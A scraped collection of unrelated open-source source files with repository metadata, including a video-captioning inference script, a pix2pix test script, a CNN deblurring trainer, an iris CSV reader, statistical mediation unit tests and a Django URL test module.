        # construction keeps working; values may also be passed directly.
        self.name = name        # employee name
        self.number = number    # employee number
        self.hours = hours      # hours worked
        self.pay = pay          # pay per hour, in pounds

    def __repr__(self):
        return ('Payslip(name=%r, number=%r, hours=%r, pay=%r)'
                % (self.name, self.number, self.hours, self.pay))
# Module-level store of every payslip entered so far.
payslips = []


def enter_values(employee_count=15):
    """Prompt for employee details and append one Payslip per employee.

    :param employee_count: how many employees to read (default 15, the
        historical hard-coded value)
    :return: the shared `payslips` list, for convenience
    :raises ValueError: if a numeric prompt receives non-numeric input
    """
    for _ in range(employee_count):
        payslip = Payslip()
        payslip.name = input("Please enter the name of the employee: ")
        payslip.number = int(input("Please enter the employee's employee number: "))
        payslip.hours = int(input("Please enter the number of hours worked by the employee: "))
        payslip.pay = int(input("Please enter the pay per hour of the employee(in pounds): "))
        payslips.append(payslip)
    return payslips
| [
"44858@PC004142.coll.lr.local"
] | 44858@PC004142.coll.lr.local |
7dfdda254e255ca9e99096ee203e40f5f0036550 | 20c4041b1c0c9ba5b129321be07be3feb83c0cb8 | /main/predict.py | e1a8a81c624ff69ac608eb805db0aa973922bd15 | [] | no_license | PelinSeloglu/GEVAP | ad807ed652169401c9ebe0be8c7bf0e03564d38f | 81a764012421b715c1d6d31e3776bd55afeaa6e9 | refs/heads/main | 2023-06-29T21:13:18.943069 | 2021-08-08T14:52:47 | 2021-08-08T14:52:47 | 393,968,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,347 | py | import os
import shutil
import glob
from pretrainedmodels import resnet152
import numpy as np
import pretrainedmodels.utils as util
import torch
import torch.nn as nn
import opts
from models import EncoderRNN, DecoderRNN, S2VTAttModel
import mix.utils as utils
import json
import cv2
from language import *
C, H, W = 3, 224, 224  # channels, height, width of the image tensors fed to the CNN
def extract_frames(video, dst):
    """Decode every frame of `video`, resize to 400x300, and save JPEGs into `dst`."""
    capture = cv2.VideoCapture(video)
    frame_index = 0
    while capture.isOpened():
        ok, frame = capture.read()
        if not ok:
            break
        resized = cv2.resize(frame, (400, 300))
        cv2.imwrite(dst + '/' + 'kang' + str(frame_index) + '.jpg', resized)
        frame_index += 1
    capture.release()
    cv2.destroyAllWindows()
def extract_feats(video_path):
    """Extract per-frame ResNet-152 features for `video_path` and save them to disk.

    Frames are dumped under ../data/sample/<video_id>/, 40 of them are sampled
    uniformly, pushed through ResNet-152 with the classifier head removed, and
    the feature matrix is written to ../data/sample/<video_id>.npy.

    :param video_path: path to the input video file
    :return: numpy array of the 40 sampled frames' features
    """
    C, H, W = 3, 224, 224
    model = resnet152(pretrained='imagenet')
    load_image_fn = util.LoadTransformImage(model)
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    # Replace the classification layer with identity so the model emits features.
    model.last_linear = util.Identity()
    model = nn.DataParallel(model)
    model = model.cuda()
    model.eval()
    dir_fc = '../data/sample'
    if not os.path.isdir(dir_fc):
        os.mkdir(dir_fc)
    print("save video feats to %s" % dir_fc)
    # The video id is the file name without its extension.
    video_id = video_path.split("/")[-1].split(".")[0]
    print(video_id)
    os.mkdir(dir_fc + '/' + video_id)
    dst = '../data/sample/' + video_id
    extract_frames(video_path, dst)
    # Sample 40 frames uniformly across the whole clip.
    image_list = sorted(glob.glob(os.path.join(dst, '*.jpg')))
    samples = np.round(np.linspace(0, len(image_list) - 1, 40))
    image_list = [image_list[int(sample)] for sample in samples]
    images = torch.zeros((len(image_list), C, H, W))
    for iImg in range(len(image_list)):
        img = load_image_fn(image_list[iImg])
        images[iImg] = img
    with torch.no_grad():
        fc_feats = model(images.cuda()).squeeze()
    img_feats = fc_feats.cpu().numpy()
    # Save the extracted CNN features
    outfile = os.path.join(dir_fc, video_id + '.npy')
    np.save(outfile, img_feats)
    # cleanup the temporary frame images
    shutil.rmtree(dst)
    return img_feats
if __name__ == '__main__':
    # Parse options and point the script at the checkpoint to load.
    opt = opts.parse_opt()
    opt = vars(opt)
    opt['saved_model'] = '../data/save/model_10.pth'
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    # Build the encoder/decoder pair; 16860 is the decoder's vocabulary size
    # (presumably matching ../data/info.json - TODO confirm).
    encoder = EncoderRNN(opt["dim_vid"], opt["dim_hidden"], bidirectional=bool(opt["bidirectional"]),
                         # opt["bidirectional"] was the old form, before the bool() cast
                         input_dropout_p=opt["input_dropout_p"], rnn_dropout_p=opt["rnn_dropout_p"])
    decoder = DecoderRNN(16860, opt["max_len"], opt["dim_hidden"], opt["dim_word"],
                         input_dropout_p=opt["input_dropout_p"],
                         rnn_dropout_p=opt["rnn_dropout_p"],
                         bidirectional=bool(opt["bidirectional"]))  # opt["bidirectional"] was the old form
    model = S2VTAttModel(encoder, decoder).cuda()
    model.load_state_dict(torch.load(opt['saved_model']))
    model.eval()
    video_path = '../data/sample_video/video00.mp4'
    # Extract CNN features for the sample video and run caption inference.
    image_feats = extract_feats(video_path)
    fc_feat = torch.from_numpy(image_feats).type(torch.FloatTensor)
    fc_feat = torch.unsqueeze(fc_feat, 0).cuda()
    with torch.no_grad():
        seq_probs, seq_preds = model(fc_feat, mode='inference', opt=opt)
    # Map predicted token ids back to words and speak/print the caption.
    vocab = json.load(open('../data/info.json'))['ix_to_word']
    prediction = utils.decode_sequence(vocab, seq_preds)
    speak_main(prediction)
    print('Tahmin: ', prediction[0])
"pelinseloglu@gmail.com"
] | pelinseloglu@gmail.com |
3db372c385c4b4645e4775a4a42beed4996904b5 | fc02c7226b3922d8c34e5b57e7426dd757d3186f | /test.py | 99747c20b27cadd1502b3779702d2a77e96a8eb9 | [] | no_license | RoseRollZhu/Lab2Pix-V2 | af2812b54ba3f7f8ae6846bae8f986b28f70d811 | 967ae52f149bee6200e6d21ba3e370b210c36d04 | refs/heads/main | 2023-04-06T18:27:22.443047 | 2021-04-16T07:11:49 | 2021-04-16T07:11:49 | 355,521,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | import os
from collections import OrderedDict
import data
from options.test_options import TestOptions
from trainers.pix2pix_trainer import Pix2PixTrainer
from util.visualizer import Visualizer
from util import html
import torch
opt = TestOptions().parse()
assert len(opt.gpu_ids) == 1
os.environ['MASTER_ADDR'] = opt.master_address
os.environ['MASTER_PORT'] = opt.master_port
torch.backends.cudnn.benchmark = True
torch.distributed.init_process_group(backend="nccl")
local_rank = torch.distributed.get_rank()
torch.cuda.set_device(local_rank)
dataloader = data.create_dataloader(opt)
trainer = Pix2PixTrainer(opt)
if local_rank == 0:
visualizer = Visualizer(opt)
# create a webpage that summarizes the all results
if local_rank == 0:
web_dir = os.path.join(opt.results_dir, opt.name,
'%s_%s' % (opt.phase, opt.which_epoch))
webpage = html.HTML(web_dir,
'Experiment = %s, Phase = %s, Epoch = %s' %
(opt.name, opt.phase, opt.which_epoch))
# test
for i, data_i in enumerate(dataloader):
if i * opt.batchSize >= opt.how_many:
break
generated = trainer.inference(data_i)
if local_rank == 0:
img_path = data_i['path']
for b in range(generated.shape[0]):
print('process image... %s' % img_path[b])
visuals = OrderedDict([
('input_label', data_i['label'][b]),
('synthesized_image', generated[b])
])
visualizer.save_images(webpage, visuals, img_path[b:b+1])
webpage.save()
| [
"junchen.zhu@hotmail.com"
] | junchen.zhu@hotmail.com |
bc3e3c9684f089084fe0fc0d38133f983ab268c3 | 42f4238073a70d1494537f8c8b07835b531e73a9 | /cases/3d/zalesak/ls_vortex_3d_n.py | 867bc7cb38211e8281f0cf96a2c44ce3c3bbcaba | [] | no_license | erdc/proteus-mprans | bd99257af7b3bbe08386533faf072dba22e93a61 | f8f4d20bc870b361c64c8ca2ceb99f045b373323 | refs/heads/master | 2022-09-11T13:18:39.973962 | 2022-08-11T16:27:29 | 2022-08-11T16:27:29 | 2,303,947 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,466 | py | from proteus import *
from proteus.default_n import *
from ls_vortex_3d_p import *
from vortex import *
nd = 3
if timeIntegration_ls == "BE":
timeIntegration = BackwardEuler_cfl
stepController = Min_dt_controller
#timeIntegration = VBDF
#stepController = Min_dt_cfl_controller
#timeOrder =2
elif timeIntegration_ls == "FLCBDF":
timeIntegration = FLCBDF
stepController = FLCBDF_controller
elif timeIntegration_ls == "RK":
if cDegree_ls == -1:
timeIntegration = LinearSSPRKPIintegration
else:
timeIntegration = LinearSSPRKintegration
stepController=Min_dt_RKcontroller
timeOrder = pDegree_ls+1
nStagesTime = timeOrder
else:
raise RuntimeError
if useHex:
if pDegree_ls == 1:
femSpaces = {0:C0_AffineLinearOnCubeWithNodalBasis}
elif pDegree_ls == 2:
femSpaces = {0:C0_AffineLagrangeOnCubeWithNodalBasis}#this is hardwired to p2 right now
else:
print "pDegree_ls = %s not recognized " % pDegree_ls
elementQuadrature = CubeGaussQuadrature(nd,vortex_quad_order)
elementBoundaryQuadrature = CubeGaussQuadrature(nd-1,vortex_quad_order)
else:
if pDegree_ls == 1:
femSpaces = {0:C0_AffineLinearOnSimplexWithNodalBasis}
elif pDegree_ls == 2:
femSpaces = {0:C0_AffineQuadraticOnSimplexWithNodalBasis}
else:
print "pDegree_ls = %s not recognized " % pDegree_ls
elementQuadrature = SimplexGaussQuadrature(nd,vortex_quad_order)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd-1,vortex_quad_order)
subgridError = None
subgridError = HamiltonJacobi_ASGS_opt(coefficients,nd,lag=True)
massLumping = False
numericalFluxType = None
shockCapturing = ResGradQuad_SC(coefficients,nd,shockCapturingFactor=shockCapturingFactor_ls,lag=True)
numericalFluxType = DoNothing
multilevelNonlinearSolver = Newton
levelNonlinearSolver = Newton
nonlinearSmoother = NLGaussSeidel
fullNewtonFlag = True
tolFac = 0.0
nl_atol_res = atolLevelSet
maxNonlinearIts = 50
matrix = SparseMatrix
if parallel:
multilevelLinearSolver = PETSc
levelLinearSolver = PETSc
linear_solver_options_prefix = 'ncls_'
linearSolverConvergenceTest = 'r-true'
else:
multilevelLinearSolver = LU
levelLinearSolver = LU
linTolFac = 0.001
conservativeFlux = {}
#checkMass = True
if not applyCorrection and checkMass:
auxiliaryVariables = [AuxiliaryVariables.ConservationHistoryLS("vortex3dnc"+`lRefinement`)]
| [
"IdoAkkerman@gmail.com"
] | IdoAkkerman@gmail.com |
7a452129eff32f63174f23daa3aaad8b876fbdff | 5dd58c23db7495b5c5882ba58f6e5a513baebffd | /lessons/my_iris_reader.py | d697c795865cc280f12a8aa0c0212d62e1916371 | [] | no_license | cra/rea-python101-for-da-in-econ | 649683bd3a5a88f54f51a9b3615660599f7e7af1 | a8c440038d512b328571dbbb5aa30f1c873469e7 | refs/heads/master | 2021-04-06T09:14:07.114201 | 2018-04-26T20:57:00 | 2018-04-26T20:57:00 | 124,781,250 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,039 | py | # coding: utf-8
import csv
import os
ALLOWED_IRIS_TYPES = ["Iris-setosa", "Iris-versicolor", "Iris-virginica"]
# TODO: import functools, использовать wraps чтобы сохранить help
def protect_iris(func):
def inner_f(*args, **kw):
try:
return func(*args, **kw)
except KeyError:
print("Знать что-то про такой Iris запрещено")
return inner_f
class IrisReader:
def __init__(self, fpath, ignore_type="Iris-virginica"):
self.fpath = fpath
self.ignore_type = ignore_type
self.stats = {}
self.read_stats_from_csv()
def read_stats_from_csv(self):
with open(self.fpath) as f:
n = 0
for row in csv.reader(f):
n += 1
if n == 1: # skip header
continue
s_len, s_width, p_len, p_width, name = row
if name == self.ignore_type:
continue
name = name.strip()
if name in self.stats:
self.stats[name]["sepalLength"].append(float(s_len))
self.stats[name]["sepalWidth"].append(float(s_width))
self.stats[name]["petalLength"].append(float(p_len))
self.stats[name]["petalWidth"].append(float(p_width))
else:
self.stats[name] = {
"sepalLength": [],
"sepalWidth": [],
"petalLength": [],
"petalWidth": [],
}
@property
def iris_types(self):
return self.stats.keys()
@protect_iris
def give_min(self, iris_type, feature=None):
if feature is not None:
return min(self.stats[iris_type][feature])
return [min(f) for f in self.stats[iris_type].values()]
@protect_iris
def give_max(self, iris_type, feature=None):
if feature is not None:
return max(self.stats[iris_type][feature])
return [
self.give_max(iris_type, f) for f in self.stats[iris_type].keys()
]
@protect_iris
def give_avg(self, iris_type, feature=None):
if feature is not None:
values = self.stats[iris_type][feature]
return sum(values) / len(values)
return [
self.give_avg(iris_type, f) for f in self.stats[iris_type].keys()
]
@protect_iris
def give_sma(self, iris_type, feature):
""" blablabla """
l = 3
smooth = []
values = self.stats[iris_type][feature]
for j in range(l - 1, len(values)):
i, tmp = 0, 0
while i < l:
tmp += values[j - i]/l
i += 1
smooth.append(tmp)
return smooth
if __name__ == "__main__":
r = IrisReader(os.path.join("..", "datasets", "iris.csv"), ignore_type='')
print("Привет")
print(r.give_avg("Iris-virginica"))
| [
"c6h10o5@gmail.com"
] | c6h10o5@gmail.com |
9b208b6430c836bcfb82db54923021aa68be7d56 | 149f2876d9a95933185521b22e3d2fa2f7358bb9 | /CNNDeblur/train.py | a2014e5f8cc27616108a310246792e4ea34724e0 | [] | no_license | LakshBhambhani/InterSTEM-ML-Research | 758affd8ef63dcf39e5cebe107efb3291630c96a | 277577223bb759d7620e74793449590c047acc95 | refs/heads/main | 2023-02-21T03:14:05.537193 | 2021-01-24T15:38:26 | 2021-01-24T15:38:26 | 316,973,819 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,176 | py | import tensorflow as tf
import numpy as np
from datetime import datetime
from imageio import imwrite
import glob
import os
class Model(object):
def __init__(self):
self.sess = tf.Session()
checkpoint_path = "training_1/cp.ckpt"
checkpoint_dir = os.path.dirname(checkpoint_path)
# Create a callback that saves the model's weights
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,
save_weights_only=True,
verbose=1)
self.train_dataset, self.val_dataset = self.create_datasets()
self.train_init, self.val_init, self.input, self.target, self.output, self.loss, self.is_training = \
self.create_network()
self.train_summaries, self.val_summaries, self.summary_writer = self.create_summaries()
self.filename_pl, self.load_image_op = self.load_image()
self.global_step = tf.Variable(0, trainable=False, name='global_step', dtype=tf.int64)
self.optimizer = tf.train.AdamOptimizer(learning_rate=5e-4)
self.train_op = self.optimizer.minimize(self.loss, global_step=self.global_step)
self.init = tf.global_variables_initializer()
def load_image(self):
filename = tf.placeholder(tf.string, shape=())
img = tf.read_file(filename)
img = tf.image.decode_image(img, channels=1)
img = tf.image.convert_image_dtype(img, dtype=tf.float32)
return filename, img
def create_summaries(self):
loss_summary = tf.summary.scalar('train/loss', self.loss)
validation_loss_summary = tf.summary.scalar('validation/validation_loss', self.loss)
train_summaries = [loss_summary]
train_summaries = tf.summary.merge(train_summaries)
val_summaries = tf.summary.merge([validation_loss_summary])
datestring = datetime.strftime(datetime.now(), '%m-%d_%H%M%S')
run_name = datestring
log_dir = "../logs/" + run_name + "/"
summary_writer = tf.summary.FileWriter(log_dir, self.sess.graph)
return train_summaries, val_summaries, summary_writer
@staticmethod
def map_data(filename, target_filename):
image = tf.read_file(filename)
image = tf.image.decode_image(image, channels=1)
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
target_image = tf.read_file(target_filename)
target_image = tf.image.decode_image(target_image, channels=1)
target_image = tf.image.convert_image_dtype(target_image, dtype=tf.float32)
return image, target_image
def create_datasets(self):
blurred_files = glob.glob('../data/blurred/*.png')
target_files = []
n_samples = len(blurred_files)
for i, f in enumerate(blurred_files):
target_f = f.replace('blurred', 'target')[:-6] + '.png'
target_files.append(target_f)
n_train_samples = int(0.8 * n_samples)
train_dataset = tf.data.Dataset.from_tensor_slices((blurred_files[:n_train_samples],
target_files[:n_train_samples]))
train_dataset = train_dataset.repeat().map(Model.map_data, num_parallel_calls=8)
val_dataset = tf.data.Dataset.from_tensor_slices((blurred_files[n_train_samples:],
target_files[n_train_samples:]))
val_dataset = val_dataset.map(Model.map_data, num_parallel_calls=8)
batch_size = 16
train_dataset = train_dataset.batch(batch_size=batch_size).prefetch(2)
val_dataset = val_dataset.batch(batch_size=batch_size)
return train_dataset, val_dataset
def create_network(self):
iter = tf.data.Iterator.from_structure(self.train_dataset.output_types,
self.train_dataset.output_shapes)
train_init = iter.make_initializer(self.train_dataset)
val_init = iter.make_initializer(self.val_dataset)
input, target = iter.get_next()
input = tf.reshape(input, shape=[-1, 28, 28, 1])
target = tf.reshape(target, shape=[-1, 28, 28, 1])
kernel_sizes = [7, 5, 3]
channel_numbers = [64, 64, 1]
is_training = tf.placeholder_with_default(True, shape=())
output = tf.layers.conv2d(input, channel_numbers[0], [kernel_sizes[0], kernel_sizes[0]], padding="same",
activation=tf.nn.relu)
output = tf.layers.dropout(output, rate=0.1, training=is_training)
for i in range(1, len(kernel_sizes[:-1])):
output = tf.layers.conv2d(output, channel_numbers[i], [kernel_sizes[i], kernel_sizes[i]], padding="same",
activation=tf.nn.relu)
output = tf.layers.dropout(output, rate=0.1, training=is_training)
output = tf.layers.conv2d(output, channel_numbers[-1], [kernel_sizes[-1], kernel_sizes[-1]], padding="same",
activation=None)
loss = tf.losses.mean_squared_error(labels=target, predictions=output)
return train_init, val_init, input, target, output, loss, is_training
def run_training(self):
self.sess.run(self.init)
saver = tf.train.Saver()
i = 0
while i<=1: #training for a limited number of cycles
self.train()
self.validate(i)
if i % 25 == 0:
self.test(i)
i += 1
saver.save(self.sess, 'my_test_model')
#save
def train(self, num_steps=250):
self.sess.run(self.train_init)
loss = 0.
for i in range(num_steps):
try:
_, l = self.sess.run([self.train_op, self.loss])
loss += l
except tf.errors.OutOfRangeError:
break
summ, step = self.sess.run([self.train_summaries, self.global_step], feed_dict={self.loss: loss / num_steps})
self.summary_writer.add_summary(summ, step)
def validate(self, i):
self.sess.run(self.val_init)
val_loss = 0
n = 0
while True:
try:
inp, targets, outp, l = self.sess.run([self.input, self.target, self.output, self.loss],
feed_dict={self.is_training: False})
val_loss += l
n += 1
if n > i or i % 25 != 0:
continue
path = '../data/val/{:05d}'.format(i)
os.makedirs(path, exist_ok=True)
for i in range(min(50, inp.shape[0])):
img = np.clip(inp[i], 0, 1) * 255.
pred = np.clip(outp[i], 0, 1) * 255.
target = np.clip(targets[i], 0, 1) * 255.
stacked_imgs = np.vstack([img, pred, target]).astype(np.uint8)
imwrite(os.path.join(path, "img_{:05d}.png".format(i)), stacked_imgs)
except tf.errors.OutOfRangeError:
break
print(i, "Val Loss: ", val_loss / n)
summ, step = self.sess.run([self.val_summaries, self.global_step], feed_dict={self.loss: val_loss / n})
self.summary_writer.add_summary(summ, step)
self.summary_writer.flush()
def test(self, i):
path = '../data/test/{:05d}'.format(i)
os.makedirs(path, exist_ok=True)
test_files = glob.glob('../data/test_images/*.png')
for i, f in enumerate(test_files):
img = self.sess.run(self.load_image_op, feed_dict={self.filename_pl: f})
img = np.reshape(img, newshape=[28, 28, 1])
pred = self.sess.run(self.output, feed_dict={self.input: [img], self.is_training: False})[0]
pred = np.clip(pred, 0, 1)
stacked_imgs = np.vstack([img, pred]) * 255
imwrite(os.path.join(path, "img_{:05d}.png".format(i)), stacked_imgs.astype(np.uint8))
if i > 500:
break
def main():
m = Model()
m.run_training()
if __name__ == '__main__':
main()
| [
"lakshbh@gmail.com"
] | lakshbh@gmail.com |
718209cd4e9b8129270bfd7cfce002ecbefdd48f | e49b654d3db99773390c5b9686df9c99fbf92b2a | /linked_lists/remove_nth_from_end.py | df9193a1a375cfc8ab394f07106bc5c85074e045 | [] | no_license | hao89/diary_of_programming_puzzles | 467e8264d0ad38768ba5ac3cfb45301293d79943 | 0e05d3716f28075f99bbd7b433d16a383209e57c | refs/heads/master | 2021-01-16T00:49:38.956102 | 2015-08-25T13:44:53 | 2015-08-25T13:44:53 | 41,692,587 | 1 | 0 | null | 2015-08-31T18:20:38 | 2015-08-31T18:20:36 | Python | UTF-8 | Python | false | false | 1,207 | py | """
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
| [
"me@davidadamojr.com"
] | me@davidadamojr.com |
5bf06775a401ac55bb8353e8ceb73f191ddf3fbd | 7f979acc529ce833014f82d0e1c4b98f5330a149 | /inferential/test/test_simple_mediation.py | 1f2100e5a2ce83c945e2a9ebd894a19e50b6e119 | [
"MIT"
] | permissive | eribean/RyStats | 4d12c8657203e0e2ab73439936ccdab0420a3d7b | 1cdd0ea55a074cc81e61d2845216f395ba095f10 | refs/heads/main | 2023-05-23T02:44:18.940487 | 2021-10-29T18:01:38 | 2021-10-29T18:01:38 | 386,011,559 | 9 | 1 | MIT | 2021-10-29T18:01:38 | 2021-07-14T16:50:53 | Python | UTF-8 | Python | false | false | 2,826 | py | import unittest
import numpy as np
from RyStats.inferential import simple_mediation
class TestSimpleMediation(unittest.TestCase):
"""Test Fixture for Simple Mediation."""
def test_total_mediation(self):
"""Testing total mediation."""
rng = np.random.default_rng(842574782795233252432)
coeff1 = -1.2
coeff2 = 2.3
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * mediator + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'], coeff2, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], 0.0, delta=0.02)
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'], 100, delta=1.0)
def test_no_mediation(self):
"""Testing no mediation."""
rng = np.random.default_rng(62098271062615234511)
coeff1 = -1.2
coeff2 = 2.3
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * independent + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'], 0.0, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], coeff2, delta=0.02)
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'], 0, delta=1.0)
def test_partial_mediation(self):
"""Testing partial mediation."""
rng = np.random.default_rng(62098271062615234511)
coeff1 = 1.2
coeff2 = 2.3
coeff3 = 0.76
independent = rng.standard_normal(1000)
mediator = coeff1 * independent + rng.normal(0, .3, 1000)
dependent = coeff2 * mediator + coeff3 * independent + rng.normal(0, .2, 1000)
results = simple_mediation(dependent, independent, mediator)
self.assertAlmostEqual(results['Mediated Effect']['Coefficient'],
coeff2, delta=0.02)
self.assertAlmostEqual(results['Second Effect']['Coefficient'], coeff1, delta=0.02)
self.assertAlmostEqual(results['Direct Effect']['Coefficient'], coeff3, delta=0.02)
percent_mediated = 100 * (coeff1 * coeff2 / (coeff3 + coeff1 * coeff2))
self.assertAlmostEqual(results['Percent Mediated']['Coefficient'],
percent_mediated, delta=1.0)
if __name__ == "__main__":
unittest.main() | [
"noreply@github.com"
] | noreply@github.com |
0ef17e43fef2010f460cdb99cec32546cff45256 | 1eb1cd97444baf7f6bcf01c06d5cd22ba4f8f02e | /sessionwiz/urls.py | 1e82d1c68c7d222c65a4d3defe82a48385072bf6 | [] | no_license | rreddy80/sessionwiz_models | 000f236d27e0cf453719a1afa508b9f264f057fc | a265bcd68f9646632a9a4b44a98f0ca1b9ed4a89 | refs/heads/master | 2020-04-06T07:09:09.884189 | 2016-05-10T16:15:56 | 2016-05-10T16:15:56 | 21,155,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^example/', include('example.urls', namespace='example')),
)
| [
"vramesh.reddy@gmail.com"
] | vramesh.reddy@gmail.com |
a06334c157b4ac4e6ccf865d6a746fd36b7580b1 | f69b92d327621cc14323e6d50d87daf90c4a826f | /setup.py | 526facdce7ba36f74727d3f46d57b87b8c7d4ae5 | [
"BSD-3-Clause"
] | permissive | MelbourneHighSchoolRobotics/mindpile | 4a2c06fcc7c7a01a8c17a450cbb3288b26a9142a | 9dd0a14ee336810c2b62826afff4da8719455ba0 | refs/heads/main | 2023-06-21T18:42:32.118860 | 2021-07-20T08:32:23 | 2021-07-20T08:41:46 | 285,460,404 | 2 | 0 | BSD-3-Clause | 2021-04-30T12:26:51 | 2020-08-06T03:09:27 | Python | UTF-8 | Python | false | false | 1,236 | py | import os.path
from setuptools import setup
REQUIRES_PYTHON = ">=3.9.0"
HERE = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(HERE, "README.md"), encoding="utf-8") as fid:
README = fid.read()
with open(os.path.join(HERE, "requirements.txt")) as fid:
REQUIREMENTS = [req for req in fid.read().split("\n") if req]
from mindpile import __version__
setup(
name="mindpile",
version=__version__,
description="Transpiles Mindstorms to ev3dev2 python.",
long_description=README,
long_description_content_type="text/markdown",
python_requires=REQUIRES_PYTHON,
url="https://github.com/MelbourneHighSchoolRobotics/mindpile",
author="Angus Trau, Richard Huang, Jackson Goerner, Peter Drew",
author_email="contact@angus.ws, me@huangrichard.com, jgoerner@outlook.com, peter@pdrew.com",
license="BSD-3-Clause",
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
],
packages=["mindpile"],
include_package_data=True,
install_requires=REQUIREMENTS,
entry_points={
"console_scripts": [
"mindpile=mindpile.main:main",
]
},
)
| [
"37640160+glipR@users.noreply.github.com"
] | 37640160+glipR@users.noreply.github.com |
0fad1a1ef57ca5dc37b1a8aac705575a661aafba | 5eadb550d0c12a39544885bd6cea7314052f3fba | /Files_exercise/lecture3.py | 2dec18eb98427def06b257f3bc468779852a3968 | [] | no_license | thebiochemguy/sre-class | 1b0730882bfe4a935398a083ee531b163d1504e4 | 4b7b72aa5f160e5028f899a1b25331482e162a77 | refs/heads/master | 2020-08-05T21:33:24.817480 | 2019-11-12T03:55:57 | 2019-11-12T03:55:57 | 212,719,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import re
phonenum=re.compile(r'(\d\d\d)-(\d\d\d-\d\d\d\d)')
search=phonenum.findall("my number is 123-456-2345-123-123-2342.")
print(search[0]) | [
"juan@workstation1.localdomain"
] | juan@workstation1.localdomain |
bffdd5605e70c0218027950b2a97ca075262aee1 | 66dead2e38d06f5ca06463d669515876f7eb1771 | /{{cookiecutter.project_name}}/tests/test_server/test_urls.py | abb5b5626aa423ead2e752d00c266d5a31417071 | [
"MIT"
] | permissive | viktortat/wemake-django-template | 349920117d008e545db162ea11c4235fdf4bf0df | 991bbb8b34ed4b705d38080caa1ffa3893362520 | refs/heads/master | 2020-03-21T10:32:01.894036 | 2018-06-22T09:41:22 | 2018-06-22T09:41:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | # -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
| [
"mail@sobolevn.me"
] | mail@sobolevn.me |
a18b2132c6645e3c3e8102f1e3acf82ca7ee3c73 | bc441bb06b8948288f110af63feda4e798f30225 | /tuna_service_sdk/model/easy_flow/task_pb2.pyi | 99c3f43d6dca4676b4ba29fcf6e453c206047933 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,667 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from google.protobuf.struct_pb2 import (
Struct as google___protobuf___struct_pb2___Struct,
)
from tuna_service_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from tuna_service_sdk.model.easy_flow.package_info_pb2 import (
PackageInfo as tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo,
)
from tuna_service_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
